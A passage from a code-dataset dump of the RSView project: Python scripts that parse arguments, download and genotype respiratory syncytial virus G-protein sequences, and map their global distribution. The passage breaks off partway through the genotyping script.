"text": "\"\"\"Argument parser for `rsview`\"\"\"\n\nimport sys\nimport argparse\n\nfrom argparse import RawTextHelpFormatter\n\nimport rsview\n\nclass ArgumentParserNoArgHelp(argparse.ArgumentParser):\n \"\"\"Like *argparse.ArgumentParser*, but prints help when no arguments.\"\"\"\n def error(self, message):\n \"\"\"Prints error message, then help.\"\"\"\n sys.stderr.write('error: {0}\\n\\n'.format(message))\n self.print_help()\n sys.exit(2)\n\n\ndef map_parser():\n \"\"\"Returns argument parser for `map_rsv.py`\"\"\"\n parser = argparse.ArgumentParser(description=\"Plot global distribution \"\\\n \"of RSV\")\n parser.add_argument('level', type=str, choices=['subtype', 'genotype'],\n help=\"Specify whether the subtype or genotype of RSV sequences \"\\\n \"should be plotted\")\n parser.add_argument('datadir', type=str,\n help=\"Specify the directory that contains seq_download.py output\")\n parser.add_argument('--genotype-level', type=str, choices=['collapse', 'all'],\n default='collapse', help=\"Specify whether to plot all genotypes of \"\\\n \"RSV or collapse them into major clades\")\n parser.add_argument('--years', default=[1990, 2018],\n help=\"Specify a range of years to plot. Example: [1990, 2018]. If 'all'\"\\\n \"is specified, all years for which there are data points will be plotted\")\n return parser\n\ndef seq_parser():\n \"\"\"Returns argument parser for `seq_download.py`.\"\"\"\n parser = ArgumentParserNoArgHelp(\n description='Downloads RSV G protein sequences & metadata from '\\\n 'Genbank. This program is part of {0} (version {1}) written by '\\\n '{2}.'.format(rsview.__name__, rsview.__version__,\n rsview.__author__) + 'For documentation, see {0}'.format(\n rsview.__url__),\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--email', required=True, type=str, help='User email'\\\n ' for GenBank download.')\n parser.add_argument('--query', required=True, type=str, help='Search '\\\n 'term(s) for downloading sequences from GenBank.')\n parser.add_argument('--outdir', required=True, type=str, help='Directory'\\\n 'for downloaded data.')\n parser.add_argument('--outprefix', default='RSVG_gb_metadata', type=str,\n help='Beginning of file name for output `.csv`. Suffix will '\\\n 'specify number of sequences downloaded.')\n parser.add_argument('--db', default='nuccore', type=str, help='Entrez'\\\n ' database to search.')\n parser.add_argument('--firstseq', default=0, type=int, help='Index of '\\\n 'first sequence to download.')\n parser.add_argument('--filesize', default=5000, type=int, help='Number of '\\\n 'seqs to download into one file. Default of 5000 balances '\\\n 'download time and minimizing the number of separate files.')\n parser.add_argument('--maxseqs', default=20000, type=int, help='Maximum '\\\n 'number of sequence hits to search for and download across all '\\\n 'output files.')\n parser.add_argument('--batchsize', default=100, type=int, help='Number '\\\n 'seqs to download in one retrieval. If much larger than 100, '\\\n 'download will be quite slow.')\n parser.add_argument('--filetype', default='gb', type=str, help='File '\\\n 'type of sequences downloaded from GenBank.')\n parser.add_argument('--outmode', default='xml', type=str, help='File '\\\n 'type for results of GenBank query.')\n\n return parser\n\ndef genotype_parser():\n \"\"\"Returns argparser for genotype.py\"\"\"\n parser = ArgumentParserNoArgHelp(\n description='Given RSV G protein sequences & metadata downloaded '\\\n 'from Genbank, fill in missing genotype data. 
This program is part '\\\n ' of {0} (version {1}) written by {2}.'.format(rsview.__name__,\n rsview.__version__, rsview.__author__) + 'For documentation, see '\n '{0}'.format(rsview.__url__),\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--inprefix', required=True, type=str, help=\"Prefix \"\\\n \"pointing to downloaded sequences and metadata files. --inprefix\"\\\n \" name should be truncated where differences begin between files\"\\\n \" that will be combined into one dataframe. Example: \"\\\n \"'./data/RSVG_gb_metadata'. \")\n parser.add_argument('--seqsdir', required=True, type=str, help=\"Directory\"\\\n \" for outputting generated fasta and alignment files.\")\n parser.add_argument('--outdir', required=True, type=str, help=\"Directory \"\\\n \"for outputting cleaned, genotyped `.csv`.\")\n parser.add_argument('--threshold', type=int, default=150,\n help=\"Threshold for how many sites must match in order to call a\"\\\n \" genotype.\")\n parser.add_argument('--full_length', type=int, default=290, help=\"Min \"\\\n \"length for a sequence to be considered full length.\")\n return parser\n\ndef plot_parser(allowed_data=\"\"):\n \"\"\"Returns argparser for plot_rsv.py\"\"\"\n parser = argparse.ArgumentParser(description=\"Plot data on child death \"\\\n \"rates from acute respiratory infection\",\n formatter_class=RawTextHelpFormatter)\n parser.add_argument(\n 'level', type=str, choices=['all', 'country'], default='all',\n help=\"Specify whether to plot data for all countries or for a \"\\\n \"specific country\")\n parser.add_argument(\n 'data_type', type=str, choices=['nnd', 'pnd', 'neo9',\n 'post9', 'ufive9', 'rneo9', 'rpost9', 'rufive9',\n 'fneo9', 'fpost9', 'fufive9'],\n help=\"Specify which category of \"\\\n \"data to plot:\\n\" + allowed_data)\n parser.add_argument('datadir', type=str,\n help=\"Specify the directory that contains\"\n + \" health data and seq_download.py output\")\n parser.add_argument(\n '--country', type=str, default='Global',\n help=\"Specify the country for which to plot data\",\n #required='level' in sys.argv and sys.args.level == \"country\"\n )\n parser.add_argument(\n '--highlight_country', type=str, default=None,\n help=\"Specify the country for to highlight\")\n return parser\n\n\n\ndef correlation_parser(allowed_data=\"\"):\n \"\"\"Returns argparser for plot_correlation.py\"\"\"\n parser = argparse.ArgumentParser(description=\"Plot data on child death \"\\\n \"rates from acute respiratory infection\",\n formatter_class=RawTextHelpFormatter)\n parser.add_argument(\n 'level', type=str, choices=['all', 'year'], default='all',\n help=\"Specify whether to plot data for all countries or for a \"\\\n \"specific country\")\n parser.add_argument(\n 'data_type', type=str, choices=['nnd', 'pnd', 'neo9',\n 'post9', 'ufive9', 'rneo9', 'rpost9', 'rufive9',\n 'fneo9', 'fpost9', 'fufive9'],\n help=\"Specify which category of \"\\\n \"data to plot:\\n\" + allowed_data)\n parser.add_argument('datadir',\n type=str,\n help=\"Specify the directory that contains\"\n + \" health data and seq_download.py output\")\n return parser\n\n\n\ndef health_parser():\n \"\"\"Returns argparser for health_download.py\"\"\"\n parser = argparse.ArgumentParser(description=\"Plot data on child death \"\\\n \"rates from acute respiratory infection\",\n formatter_class=RawTextHelpFormatter)\n parser.add_argument('datadir', type=str,\n help=\"Specify the directory that contains health data\")\n return parser\n"
},
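Editorial aside: a hedged usage sketch for the parsers above; the argument values are examples only:

```python
from rsview.parsearguments import map_parser

# parse_args accepts an explicit argv list, which is handy for testing
args = map_parser().parse_args(["subtype", "./data", "--genotype-level", "all"])
print(args.level, args.datadir, args.genotype_level)  # subtype ./data all
```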
{
"alpha_fraction": 0.5554781556129456,
"alphanum_fraction": 0.5654665231704712,
"avg_line_length": 44.31578826904297,
"blob_id": "62c42137bc671694b2083b8ae25b0c9140b557eb",
"content_id": "366b40bf24706d3f41902f4cd3c602f3172fedca",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12915,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 285,
"path": "/rsview/map_rsv.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\" Map the global distribution of Respiratory Syncytial Virus (RSV) by collection date, location,\nand viral subtype or genotype \"\"\"\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport plotly.plotly as py\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\n\nimport rsview.parsearguments\n\n\nJITTER_DICT = {'A':1.0, 'B':-1.0}\nHEALTHFILE = '/health_data_all.csv'\nGENOTYPE_DICT = {'GA2':'GA', 'GA5':'GA', 'GB12':'GB', 'GB13':'GB', 'GA3':'GA', 'NA1':'NA',\n 'NA2':'NA', 'ON1':'ON', 'SAA1':'SAA', 'BA':'BA', 'BA10':'BA', 'BA9':'BA',\n 'GB3':'GB', 'SAB1':'SAB', 'SAB3':'SAB', 'SAB4':'SAB', 'NA3':'NA', 'GB2':'GB',\n 'BA11':'BA', 'BA7':'BA', 'GA7':'GA', 'BA 10':'BA', 'BA 12':'BA', 'BA 14':'BA',\n 'BA 2':'BA', 'BA 8':'BA', 'BA 9':'BA', 'SAA2':'SAA', 'BA8':'BA', 'GA1':'GA',\n 'BA4':'BA', 'BA5':'BA', 'BA12':'BA', 'GB1':'GB', 'BA08':'BA', 'BA09':'BA',\n 'BA IV':'BA', 'THB':'TH', 'GA6':'GA', 'GB4':'GB'}\n\ndef organize_data(datadir, genotype_dict):\n \"\"\"\n Load .csv files containing RSV sequence data and extract relevant columns. Ensure country\n names to conform to standard names used to retrieve latitude and longitude data. Return a\n DataFrame where each sequence is row containing country, genotype, subtype, and collection date\n information.\n \"\"\"\n\n #Find datafiles in user-specified directory\n filename = str(datadir)+'/RSVG_all_genotyped.csv'\n #Return error if data file is not present\n\n if os.path.isfile(filename):\n pass\n else:\n raise ValueError('Sequence data has not been downloaded yet. Run seq_download.py')\n\n #Append relevant columns from all data files to DataFrame\n\n rsv_df = pd.read_csv(filename, usecols=['collection_date', 'country', 'subtype',\n 'genotype'], parse_dates=['collection_date'])\n\n rsv_df['year'] = rsv_df['collection_date'].apply(lambda x: x.year)\n rsv_df['genotype'] = rsv_df.genotype.str.replace(' ', '') #Get rid of whitespaces\n\n #Add column to group genotypes by clade\n rsv_df = rsv_df.assign(genotype_group=rsv_df['genotype'].map(genotype_dict))\n\n #Fix specific country names where city is given\n countries_with_cities = ['Brazil', 'China', 'Russia', 'New Zealand', 'Spain', 'Kenya',\n 'Germany', 'Egypt', 'India', 'Japan', 'Canada', 'Italy',\n 'Malaysia', 'Jordan', 'Saudi Arabia', 'Myanmar', 'Netherlands',\n 'France', 'Peru']\n for con in countries_with_cities:\n rsv_df['country'] = np.where(rsv_df['country'].str.contains(con), con, rsv_df['country'])\n\n #Fix specific country names where lat/lon table uses alternate country name\n rsv_df['country'] = np.where(rsv_df['country'].str.contains('USA'), 'United States',\n rsv_df['country'])\n rsv_df['country'] = np.where(rsv_df['country'].str.contains('South Korea'), 'Korea',\n rsv_df['country'])\n rsv_df['country'] = np.where(rsv_df['country'].str.contains('Viet Nam'), 'Vietnam',\n rsv_df['country'])\n rsv_df['country'] = np.where(rsv_df['country'].str.contains('Laos'), 'Lao PDR',\n rsv_df['country'])\n\n #Only keep sequences with an assigned subtype\n rsv_df = rsv_df[rsv_df['subtype'].notnull()]\n\n return rsv_df\n\n\ndef count_types(rsv_df, jitter_dict, level, datadir, genotype_level='collapse'):\n \"\"\"\n Restructure the DataFrame so that each row indicates the total number of RSV sequences\n found in each country, each year, for each subtype or genotype (specified by the level argument)\n \"\"\"\n\n #use lat and long so datapoints can be jittered to show multiple subtypes\n #lat and long data from https://worldmap.harvard.edu/data/geonode:country_centroids_az8\n\n 
lat_lon = pd.read_csv(str(datadir)+'/country_centroids.csv',\n usecols=['name', 'brk_a3', 'Longitude', 'Latitude']\n ).rename(columns={'name':'country', 'brk_a3': 'country_code'})\n\n health_data = pd.read_csv(str(datadir)+HEALTHFILE, usecols=['Country/areaname', 'year',\n 'fufive9']).rename(columns={'Country/areaname': 'country',\n 'fufive9':'under_five_deaths'})\n\n #Level specified by required argument\n if level == 'subtype':\n #count number of rows(seqs) from each country that are each subtype\n df_group = pd.DataFrame({'count' : rsv_df.groupby(['country', 'subtype',\n 'year']).size()}).reset_index()\n\n #compile country-specific subtype count data with lat and long for plotting\n organized_df = df_group.merge(lat_lon, how='left', left_on='country', right_on='country')\n organized_df = organized_df.merge(health_data, how='left', left_on=['country', 'year'],\n right_on=['country', 'year'])\n\n elif level == 'genotype':\n #count number of rows(seqs) from each country that are each subtype\n genotype_subset = rsv_df[rsv_df['genotype'].notnull()]\n\n #genotype_level can be specified by an optional argument\n if genotype_level == 'collapse':\n df_group = pd.DataFrame(\n {'count' : genotype_subset.groupby(['country', 'subtype', 'genotype_group',\n 'year']).size()}).reset_index()\n else:\n df_group = pd.DataFrame(\n {'count' : genotype_subset.groupby(['country', 'subtype', 'genotype',\n 'year']).size()}).reset_index()\n\n #compile country-specific subtype count data with lat and long for plotting\n organized_df = df_group.merge(lat_lon, how='left', left_on='country', right_on='country')\n organized_df = organized_df.merge(health_data, how='left', left_on=['country', 'year'],\n right_on=['country', 'year'])\n\n #Jitter points for countries that have multiple subtypes, so markers on map don't overlap\n country_group = organized_df.groupby('country').size()\n\n\n #With data separated by year\n organized_df['adj_lon'] = np.where(country_group[organized_df['country']] > 1,\n (organized_df['Longitude']+organized_df.subtype.map(\n lambda x: jitter_dict[x])), organized_df['Longitude'])\n\n organized_df['adj_lat'] = np.where(country_group[organized_df['country']] > 1,\n (organized_df['Latitude']+organized_df.subtype.map(\n lambda x: jitter_dict[x])), organized_df['Latitude'])\n\n #Find any country names that don't match between sequence DF and lat/lon database\n if len(organized_df[organized_df['adj_lon'].isnull()]) != 0:\n print('Warning: the following country names do not match between sequence DataFrames and\\\n \"country_centroids.csv\"' +\n str(organized_df[organized_df['adj_lon'].isnull()]['country']))\n return organized_df\n\n\ndef map_rsv(organized_df, level, genotype_level='collapse', years=[1990, 2018]):\n \"\"\"\n Use ploy.ly to map RSV sequences onto a global map, with bubbles indicating the virus\n collection location. Bubbles are colored according to subtype or genotype (indicated by the\n level argument) and their size is proportional to the number of sequences collected from the\n given location. 
Maps are separated temporally by collection date and the slider at the bottom of\n the plot allows the user to scroll through time to see how RSV distribution changes over time.\n \"\"\"\n\n #years can specified by an optional argument\n if years == 'all':\n year_range = [yr for yr in range(int(organized_df.year.min()),\n int(organized_df.year.max()))]\n else:\n year_range = [yr for yr in range(years[0], years[1]+1)]\n\n #Set color scales: blues for 'A' viruses, reds for 'B'\n blues = plt.get_cmap('GnBu')\n reds = plt.get_cmap('OrRd')\n\n if level == 'subtype':\n type_list = ['A', 'B']\n cmap = {'A': colors.to_hex(blues(0.75)),\n 'B': colors.to_hex(reds(0.75))}\n\n elif level == 'genotype':\n #genotype_level can be specified by an optional argument\n if genotype_level == 'collapse':\n a_genotypes = list(set(organized_df[organized_df['subtype'] == 'A']\n ['genotype_group'].tolist()))\n b_genotypes = list(set(organized_df[organized_df['subtype'] == 'B']\n ['genotype_group'].tolist()))\n else:\n a_genotypes = list(set(organized_df[organized_df['subtype'] == 'A']\n ['genotype'].tolist()))\n b_genotypes = list(set(organized_df[organized_df['subtype'] == 'B']\n ['genotype'].tolist()))\n type_list = a_genotypes + b_genotypes\n\n cmap = {}\n for a_genotype in a_genotypes:\n cmap[a_genotype] = colors.to_hex(\n blues((a_genotypes.index(a_genotype)+1.0)/len(a_genotypes)))\n for b_genotype in b_genotypes:\n cmap[b_genotype] = colors.to_hex(\n reds((b_genotypes.index(b_genotype)+1.0)/len(b_genotypes)))\n\n scale_markers = 1\n map_list = []\n\n #Reassign level for collapsed genotypes so 'genotype_group' will be referenced during plotting\n if level == 'genotype':\n if genotype_level == 'collapse':\n level = 'genotype_group'\n\n #Make dictionaries for each point to be plotted on a plotly map\n for i in range(len(organized_df)):\n\n map_country = dict(\n type='scattergeo',\n lat=[organized_df.loc[i, 'adj_lat']],\n lon=[organized_df.loc[i, 'adj_lon']],\n marker=dict(\n size=[np.min([organized_df.loc[i, 'count']*scale_markers, 75])],\n sizemin=5,\n color=cmap[organized_df.loc[i, level]],\n line=dict(width=0.5, color='rgb(40,40,40)'),\n opacity=0.75,\n sizemode='diameter'),\n hovertext=(organized_df.loc[i, 'country'] + '<br>' + str(level) + ' ' +\n organized_df.loc[i, level] + ' : ' + str(organized_df.loc[i, 'count'])+\n ' sequences' + '<br>'+ 'Percent under 5 y.o. 
deaths due to Acute '\\\n 'Respirator Infection: ' + str(organized_df.loc[i, 'under_five_deaths'])),\n name=organized_df.loc[i, 'country']+' '+organized_df.loc[i, level],\n legendgroup=organized_df.loc[i, level],\n showlegend=False,\n hoverinfo='text'\n )\n map_list.append(map_country)\n\n #Work around for showing legend\n for subtype in type_list:\n subtype_legend = dict(\n type='scattergeo',\n lat=[180.0],\n lon=[180.0],\n marker=dict(\n size=scale_markers*10,\n color=cmap[subtype],\n opacity=0.5,\n sizemode='area'),\n legendgroup=subtype,\n name=str(level)+ ' ' + subtype,\n showlegend=True,\n hovertext=None,\n )\n map_list.append(subtype_legend)\n\n steps = []\n for year in year_range:\n step = dict(\n method='restyle',\n label=year,\n args=['visible', [False] * (len(organized_df)+len(type_list))])\n for i in range(len(organized_df)):\n if organized_df.loc[i, 'year'] == year:\n step['args'][1][i] = True # Toggle i'th year to \"visible\"\n for subtype in type_list:\n step['args'][1][(len(organized_df)+type_list.index(subtype))] = True\n steps.append(step)\n\n layout = dict(\n title='Global distribution of RSV',\n sliders=[dict(\n steps=steps, y=0.16)],\n geo=dict(\n scope='world',\n showland=True,\n landcolor='rgb(217, 217, 217)',\n countrywidth=1,\n ),\n legend=dict(x=1.02, y=0.75))\n\n fig = dict(data=map_list, layout=layout)\n\n py.plot(fig)\n return fig\n\ndef main(level, datadir, genotype_level, years):\n \"\"\"\n Run organize_data, count_types, map_rsv\n \"\"\"\n rsv_df = organize_data(datadir, GENOTYPE_DICT)\n organized_df = count_types(rsv_df, JITTER_DICT, level, datadir, genotype_level=genotype_level)\n map_rsv(organized_df, level, genotype_level=genotype_level, years=years)\n\nif __name__ == \"__main__\":\n\n PARSER = rsview.parsearguments.map_parser()\n ARGS = PARSER.parse_args()\n\n main(ARGS.level, ARGS.datadir, genotype_level=ARGS.genotype_level, years=ARGS.years)\n"
},
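Editorial aside: the jitter trick in `count_types` deserves a small illustration: when a country reports more than one subtype, each marker is offset by a per-subtype delta so the map bubbles do not overlap. A toy sketch with made-up coordinates (column names mirror `map_rsv.py`):

```python
import pandas as pd

JITTER = {"A": 1.0, "B": -1.0}
df = pd.DataFrame({"country": ["Kenya", "Kenya", "Peru"],
                   "subtype": ["A", "B", "A"],
                   "Longitude": [37.9, 37.9, -75.0]})

# offset longitude only where a country carries multiple rows
multi = df.groupby("country")["subtype"].transform("size") > 1
df["adj_lon"] = df["Longitude"] + df["subtype"].map(JITTER).where(multi, 0.0)
print(df[["country", "subtype", "adj_lon"]])  # Kenya A -> 38.9, Kenya B -> 36.9, Peru A -> -75.0
```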
{
"alpha_fraction": 0.40833333134651184,
"alphanum_fraction": 0.40833333134651184,
"avg_line_length": 19,
"blob_id": "c6b852d6a15b9b71f82d0f72fbe43486c69754d6",
"content_id": "0b51a5a6da73a4007811b43bc568984b6923f82a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 120,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 6,
"path": "/docs/plot_correlation.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "=======================\n``plot_correlation.py``\n=======================\n\n.. automodule:: plot_correlation\n :members:\n"
},
{
"alpha_fraction": 0.5751574635505676,
"alphanum_fraction": 0.5874497294425964,
"avg_line_length": 36.33427810668945,
"blob_id": "d7408f54b559bd11eee8dc009dad815215814e28",
"content_id": "74c576cffa650e948778db3a1cbe8071eb244c94",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13179,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 353,
"path": "/rsview/genotype.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"Assign RSV G sequences genotypes.\n\nThis program relies on some seqs already being genotyped. It will\nonly add sequences to a genotype that already has a high quality\n(< 60 gaps in the alignment) sequence in the input data.\n\"\"\"\n\nimport time\nimport os\nimport glob\nimport subprocess\nimport pandas as pd\nfrom Bio import SeqIO\nimport rsview.parsearguments\n\n\n#GT_A and GT_B lists based on genotypes already known to be present.\nGT_A_LIST = ['ON1', 'GA1', 'GA2', 'GA3', 'GA5', 'GA6', 'GA7', 'NA1', 'NA2',\n 'NA3', 'SAA1', 'SAA2']\nGT_B_LIST = ['BA', 'BA2', 'BA4', 'BA5', 'BA7', 'BA8', 'BA9', 'BA10', 'BA11',\n 'BA12', 'BA14', 'THB', 'SAB1', 'SAB3', 'SAB4', 'GB1', 'GB2',\n 'GB3', 'GB4', 'GB13', 'GB12']\n\ndef hamming_distance(seq1, seq2):\n \"\"\"Return the Hamming distance between equal-length sequences.\"\"\"\n assert len(seq1) == len(seq2), \"Undefined for sequences of unequal length\"\n return sum(site1 != site2 for site1, site2 in zip(seq1, seq2))\n\n\ndef merge_csvs(csv_files):\n \"\"\"Merge given *csv_files* into one dataframe.\n\n Args:\n `csv_files` (list)\n list of .csv files to merge into dataframe\n \n Returns:\n `full_df` (dataframe)\n pandas dataframe containing data concatenated from csv_files\n \"\"\"\n file_frames = []\n for file in csv_files:\n if not os.path.isfile(file):\n raise ValueError('Sequence data not downloaded. Run '\\\n '`seq_download.py`.')\n file_df = pd.read_csv(file)\n file_frames.append(file_df)\n\n full_df = pd.concat(file_frames, ignore_index=True, sort=False)\n full_df.drop('Unnamed: 0', axis=1, inplace=True)\n\n return full_df\n\n\ndef seqstofastas(seqs_df, outfiles, full_len):\n \"\"\"\n Takes a dataframe containing sequence, subtype, and genotype info and\n outputs specified `.fasta` files.\n\n Args:\n `outfiles` (list)\n List of `.fasta` files to output. Expects 3 files:\n 1. Long G seqs already genotyped\n 2. Long G seqs not yet genotyped\n 3. All short G seqs\n\n `seqs_df` (dataframe)\n pandas dataframe containing sequence, subtype, and genotype info\n \"\"\"\n assert len(outfiles) == 3, 'Unexpected number of files to output.'\n\n lt_fasta = outfiles[0]\n l_fasta = outfiles[1]\n s_fasta = outfiles[2]\n\n with open(lt_fasta, 'w') as longtyped, \\\n open(l_fasta, 'w') as long_nogt, \\\n open(s_fasta, 'w') as short:\n for i in range(len(seqs_df)):\n stype = seqs_df.at[i, 'subtype']\n gtype = seqs_df.at[i, 'genotype']\n header = '>{0} {1} {2}\\n'.format(i, stype, gtype)\n seq = seqs_df.at[i, 'G_seq']\n if seq != 'NaN':\n if gtype != 'NaN':\n if len(seq) > full_len:\n longtyped.write('{0}{1}\\n'.format(header, seq))\n else:\n short.write('{0}{1}\\n'.format(header, seq))\n else:\n if len(seq) > full_len:\n long_nogt.write('{0}{1}\\n'.format(header, seq))\n else:\n short.write('{0}{1}\\n'.format(header, seq))\n\n\ndef alignseqs(infiles, outfiles):\n \"\"\"Use mafft to align RSV G sequences.\n\n Due to significant disparities in length, use a three step approach.\n 1. Align long G sequences with known genotypes\n 2. Add in all long G sequences using --add with --keeplength\n 3. 
Add in short G sequences using --addfragments with --keeplength\n\n Expects to align 1st infile and ouput to first outfile, then add 2nd\n infile and output as 2nd outfile, and finally add 3rd infile and output\n as 3rd outfile.\n \"\"\"\n\n assert len(infiles) == len(outfiles) == 3, 'Incorrect number of files '\\\n 'for i/o.'\n\n subprocess.check_call('mafft --auto {0} > {1}'.format(infiles[0],\n outfiles[0]), shell=True)\n\n subprocess.check_call('mafft --add {0} --reorder --keeplength {1} > {2}'\\\n .format(infiles[1], outfiles[0], outfiles[1]), shell=True)\n\n subprocess.check_call('mafft --addfragments {0} --reorder --6merpair '\\\n '--thread -1 --keeplength {1} > {2}'.format(infiles[2],\n outfiles[1], outfiles[2]), shell=True)\n\n\ndef getrefseqs(ltyped_alignment, full_alignment):\n \"\"\"From alignments, finds the longest sequences with genotype info.\n \n Args:\n `ltyped_alignment` (.fasta alignment)\n Alignment of long sequences with genotypes.\n Try to assign reference genotype sequences from these seqs first.\n \n `full_alignment` (.fasta alignment)\n Alignment of all sequences of interest.\n Look through these sequences for genotypes not found in the\n `ltyped_alignment` and assign them a reference sequence if there\n is a sequence of sufficient length (< 60 gaps compared to full).\n \n Returns:\n `gt_seqs` (dict)\n Dictionary of a reference sequence for each genotype already\n called in the data.\n\n \"\"\"\n gt_seqs = {}\n # Set reference seqs with long seqs first\n for record in SeqIO.parse(ltyped_alignment, 'fasta'):\n genotype_info = record.description.split(' ')\n if len(genotype_info) == 3:\n genotype = genotype_info[-1]\n elif len(genotype_info) == 4:\n genotype = genotype_info[2] + genotype_info[3]\n if genotype == 'BAIV':\n genotype = 'BA4'\n if genotype not in gt_seqs.keys():\n if 'X' not in str(record.seq): # No ambiguous amino acids\n gt_seqs[genotype] = str(record.seq)\n\n # Add ref seqs for genotypes with no 'long' seq\n added_gts = {}\n for record in SeqIO.parse(full_alignment, 'fasta'):\n genotype_info = record.description.split(' ')\n if len(genotype_info) == 3:\n if genotype_info[-1] != 'NaN':\n genotype = genotype_info[-1]\n elif len(genotype_info) == 4:\n genotype = genotype_info[2] + genotype_info[3]\n if genotype == 'BAIV':\n genotype = 'BA4'\n if genotype not in gt_seqs.keys(): #no full seq for gt\n if 'X' not in str(record.seq):\n if genotype not in added_gts.keys():\n added_gts[genotype] = [str(record.seq)]\n else:\n added_gts[genotype].append(str(record.seq))\n\n # Pick added reference seq with least number of gaps. Must have < 60.\n for added_gt in added_gts:\n possible_refs = added_gts[added_gt]\n gt_refseq = min(possible_refs, key=lambda seq: seq.count('-'))\n if gt_refseq.count('-') < 60:\n gt_seqs[added_gt] = gt_refseq\n\n return gt_seqs\n\ndef assign_gt(alignment, gt_refdict, hd_threshold):\n \"\"\"\n Assign a genotype to a non-genotyped sequence as long as the match\n meets a certain hamming distance threshold.\n \n Args:\n `alignment` (.fasta alignment)\n Alignment of all sequences (genotyped and non) to analyze.\n\n `gt_refdict` (dict)\n Dictionary of genotypes and reference sequences\n\n `hd_threshold` (int)\n Hamming distance threshold that sets the maximum number of \n mismatches allowed between a sequence and the most similar \n genotype reference sequence. 
If the minimum hamming distance\n between a sequence and its most similar reference sequence is \n greater than `hd_threshold`, the genotype will remain 'NaN'.\n\n Returns:\n `updated_gts` (list of tuples)\n List of df index and new genotype for sequences with new gt\n\n `mistyped` (int)\n Number of sequences that were mistyped using this genotyping \n method. Being mistyped means the method assigned them a \n genotype that did not agree with the downloaded subtype. \n These genotypes are reset to 'NaN'.\n\n \"\"\"\n\n updated_gts = []\n\n #Keep track of number seqs mistyped based on subtype/genotype disagreement\n mistyped = 0\n mistyped_info = []\n\n for record in SeqIO.parse(alignment, 'fasta'):\n genotype = record.description.split(' ')[2]\n subtype = record.description.split(' ')[1]\n seqindex = record.name\n # only add genotypes for seqs with subtypes so can check concordance\n if genotype == 'NaN' and subtype != 'NaN':\n gt_hds = {}\n for gtype in gt_refdict:\n gt_ref = gt_refdict[gtype]\n gt_hds[gtype] = hamming_distance(gt_ref, str(record.seq))\n # At least *hd_threshold* sites must match to call genotype.\n if min(gt_hds.values()) < (len(record.seq) - hd_threshold):\n new_gt = min(gt_hds, key=gt_hds.get)\n if record.description.split(' ')[1] == 'B':\n if new_gt not in GT_B_LIST:\n mistyped += 1\n mistyped_info.append((record.name, new_gt, 'B'))\n new_gt = 'NaN'\n\n elif record.description.split(' ')[1] == 'A':\n if new_gt not in GT_A_LIST:\n mistyped += 1\n mistyped_info.append((record.name, new_gt, 'A'))\n new_gt = 'NaN'\n\n updated_gts.append((seqindex, new_gt))\n\n return [updated_gts, mistyped, mistyped_info]\n\n\ndef main():\n \"\"\"Align downloaded sequences, call genotypes, and return final df\"\"\"\n\n parser = rsview.parsearguments.genotype_parser()\n args = vars(parser.parse_args())\n prog = parser.prog\n\n print(\"\\nExecuting {0} ({1}) in {2} at {3}.\\n\".format(\n prog, rsview.__version__, os.getcwd(), time.asctime()))\n\n files = [filename for filename in glob.glob('{0}*.csv'.format(\n args['inprefix']))]\n\n if not os.path.isdir('{0}'.format(args['seqsdir'])):\n os.makedirs('{0}'.format(args['seqsdir']))\n\n if not os.path.isdir('{0}'.format(args['outdir'])):\n os.makedirs('{0}'.format(args['outdir']))\n\n outfile = '{0}/RSVG_all_genotyped.csv'.format(args['outdir'])\n\n hd_threshold = args['threshold']\n full_length = args['full_length']\n\n print('Input files: {0}'.format(files))\n\n file_frames = []\n for file in files:\n if not os.path.isfile(file):\n raise ValueError('Sequence data not downloaded. Run '\\\n '`seq_download.py`.')\n file_df = pd.read_csv(file)\n file_frames.append(file_df)\n\n rsv_df = merge_csvs(files)\n\n seqs = rsv_df[['G_seq', 'genotype', 'subtype']]\n\n already_genotyped = sum(seqs['genotype'].value_counts())\n\n print('\\nStarting with {0} of {1} seqs genotyped.\\n'.format(\n already_genotyped, len(seqs)))\n\n seqs = seqs.fillna(value='NaN') #easily callable placeholder\n\n assert seqs.G_seq.map(len).max() >= full_length, 'No full length ' \\\n 'sequences. Cannot assign new genotypes.'\n\n #Establish files for seqs. 
Make 3 files for iterative alignment.\n longtyped_fasta = '{0}/G_seqs_longtyped.fasta'.format(args['seqsdir'])\n long_fasta = '{0}/G_seqs_long_nogt.fasta'.format(args['seqsdir'])\n short_fasta = '{0}/G_seqs_short.fasta'.format(args['seqsdir'])\n\n seqs_files = [longtyped_fasta, long_fasta, short_fasta]\n\n seqstofastas(seqs, seqs_files, full_length)\n\n # Establish files for alignments\n aligned_ltyped = '{0}/G_longtyped_aligned.fasta'.format(args['seqsdir'])\n aligned_long = '{0}/G_long_all_aligned.fasta'.format(args['seqsdir'])\n aligned_all = '{0}/G_all_aligned.fasta'.format(args['seqsdir'])\n\n alignment_files = [aligned_ltyped, aligned_long, aligned_all]\n\n # Make alignments\n alignseqs(seqs_files, alignment_files)\n\n # Set reference seqs for each genotype\n gt_refs = getrefseqs(aligned_ltyped, aligned_all)\n\n # Assign new genotypes and calculate number mistyped\n new_gt_info = assign_gt(aligned_all, gt_refs, hd_threshold)\n new_gts = new_gt_info[0]\n num_mistyped = new_gt_info[1]\n mismatches = new_gt_info[2]\n\n print(\"\\n{0} genotypes mistyped and reset to 'NaN'\".format(num_mistyped))\n print(\"Those mismathces were:\")\n for mismatch in mismatches:\n print(\"Seq: {0}. Assigned genotype: {1}. Mismatched with subtype: \"\\\n \"{2}. Reset to 'NaN'.\".format(mismatch[0], mismatch[1],\n mismatch[2]))\n print('\\n{0} genotypes added.'.format(len(new_gts) - num_mistyped))\n print(\"{0} seqs now genotyped.\".format(already_genotyped + len(new_gts)\n - num_mistyped))\n\n # Assign genotypes 